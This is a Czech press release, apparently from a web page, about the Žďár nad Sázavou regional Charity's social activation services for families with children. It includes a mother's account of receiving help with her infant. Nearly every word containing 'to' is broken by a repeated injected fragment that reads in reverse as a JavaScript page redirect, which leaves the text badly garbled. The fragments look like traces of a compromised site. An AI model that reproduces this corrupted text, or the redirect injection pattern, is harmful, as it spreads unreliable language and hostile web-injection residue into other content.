Rainbow page separator

Pracovnice SAS stále v terénu

Sobota, 18. července 2015

Sociálně akviziční služby pro rodiny s dětmi

Žďár nad Sázavou /Již od ledna 2013 fungují na území bývalého okresu Žďár nad Sázavou zařízení Sociálně aktivizační služby pro rodiny s dětmi, ve zkratce SAS. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to služba spadá pod Oblastní charitu Žďár nad Sázavou. Od května [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roku jsou ve službě dvě sociální pracovnice, které spolupracují nejen s rodinami, které pomoc potřebují, ale aktivně navazují kontakty s ostatními institucemi, jako jsou např. orgány sociálně právní ochrany dětí, úřady práce, základní školy atd.

Terénní služba působí přímo v přirozeném prostředí rodiny. Snažíme se pomáhat, podporovat a vést rodiny, které se ocitly v obtížné životní situaci, a nejsou schopny vlastními silami tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to situaci řešit. V těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případech je čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ohrožen vývoj dětí a fungování celé rodiny. Pracovnice sociálně aktivizační služby pro rodiny s dětmi musí nejdříve získat důvěru členů rodiny a následně s nimi začít pracovat na zlepšení situace, ve které se nachází. Obsahem individuální spolupráce je zvyšování rodičovských kompetencí, posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování poradenství v oblasti péče o děti. Čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se jedná o správné nastavení hygienických a stravovacích návyků, výchovného režimu dne, vedení domácnosti, efektivního hospodaření s rodinným rozpočtem. Dále pracovnice doprovází uživatele na úřady, školská zařízení, pomáhají s vyřizováním sociálních dávek, zprostředkovávají následnou pomoc směřující ke zlepšení celkové situace rodiny. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to základní činnosti jsou posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny bezplatně.
Příběh mladé maminky, které charitní služba pomohla.
„Po narození syna jsem musela zůstat ještě další měsíc v nemocnici. Nechtěl jíst, nepřibíral. Po pár týdnech jsem ztratila mléko, musela jsem začít dávat sunar. Ten je ale drahý, a náš rodinný rozpočet s přítelem, který dlouhodobě nemůže najít práci, je už tak hodně napjatý. V nemocnici mi ukázaly, jak se o malého mám starat. I přes [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, mi paní dok[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka po pár měsících řekla, že má přeleženou hlavičku, že s ním musím chodit na cvičení, pravidelně podkládat. Styděla jsem se, že se neumím o syna správně postarat. Kamarádka mi doporučila slečnu z Charity, která se mnou ochotně na cvičení se synem začala chodit, všechno se snažila zapama[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat, a doma jsme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to společně procvičovali. Nyní již má hlavičku krásně kula[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, a cvičit není potřeba. Pracovnice mi ochotně radí, jak se mám nadále o syna správně starat, jak mu nastavit režim dne, jak ušetřit, společně jsme vařili několik příkrmů, které synovi moc chutnaly. Jsem ráda, že se na pracovnice můžu vždy obrátit, že se mi snaží ochotně pomoci, jelikož na rodinu se spoléhat nemohu.“

Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor tiskové zprávy: Petra Válková, DiS., vedoucí zařízení

Sociálně aktivizační služby pro rodiny s dětmi jsou zařízením Oblastní charity Žďár nad Sázavou. Naším posláním je pomoc a podpora rodinám s dětmi, jejichž vývoj je ohrožen v důsledku dlouhodobě nepříznivé sociální situace, kterou rodiny nedokáží samy překonat.